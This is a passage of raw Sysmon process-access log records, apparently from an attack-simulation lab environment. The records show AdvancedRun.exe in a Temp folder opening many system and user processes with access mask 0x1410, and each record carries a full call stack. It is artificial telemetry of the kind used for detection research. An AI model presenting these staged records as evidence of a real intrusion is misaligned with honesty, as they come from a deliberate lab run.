~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004077891Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:35.051{834264DD-14A0-61EB-9208-000000002702}60163328C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-F392-61EA-4B04-000000002702}948C:\Program Files (x86)\Internet 
Explorer\IEXPLORE.EXE0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004077890Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:35.051{834264DD-14A0-61EB-9208-000000002702}60163328C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-F392-61EA-4A04-000000002702}5408C:\Program Files\Internet 
Explorer\iexplore.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004077889Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:16:35.051{834264DD-14A0-61EB-9208-000000002702}60163328C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-E497-61EA-F401-000000002702}2136C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004077888Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:16:35.051{834264DD-14A0-61EB-9208-000000002702}60163328C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-E497-61EA-F301-000000002702}944C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004077887Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:35.051{834264DD-14A0-61EB-9208-000000002702}60163328C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-E491-61EA-F201-000000002702}3896C:\Program 
Files\Notepad++\notepad++.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004077886Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:16:35.050{834264DD-14A0-61EB-9208-000000002702}60163328C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB6F-61EA-B100-000000002702}2348C:\Windows\System32\msdtc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000004077885Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:16:35.050{834264DD-14A0-61EB-9208-000000002702}60163328C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB13-61EA-9A00-000000002702}5612C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004077884Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:16:35.049{834264DD-14A0-61EB-9208-000000002702}60163328C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB12-61EA-9900-000000002702}5508C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004077883Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:16:35.049{834264DD-14A0-61EB-9208-000000002702}60163328C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB12-61EA-9700-000000002702}5364C:\Windows\Sysmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004077882Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:16:35.048{834264DD-14A0-61EB-9208-000000002702}60163328C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB11-61EA-9500-000000002702}428C:\Windows\Explorer.EXE0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004077881Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:16:35.048{834264DD-14A0-61EB-9208-000000002702}60163328C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB10-61EA-9000-000000002702}3336C:\Windows\System32\taskhostw.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004077880Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:16:35.048{834264DD-14A0-61EB-9208-000000002702}60163328C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB10-61EA-8F00-000000002702}4948C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004077879Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:16:35.048{834264DD-14A0-61EB-9208-000000002702}60163328C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB10-61EA-8E00-000000002702}4912C:\Windows\System32\sihost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004077878Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:16:35.048{834264DD-14A0-61EB-9208-000000002702}60163328C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB10-61EA-8D00-000000002702}4820C:\Windows\System32\RuntimeBroker.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004077877Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
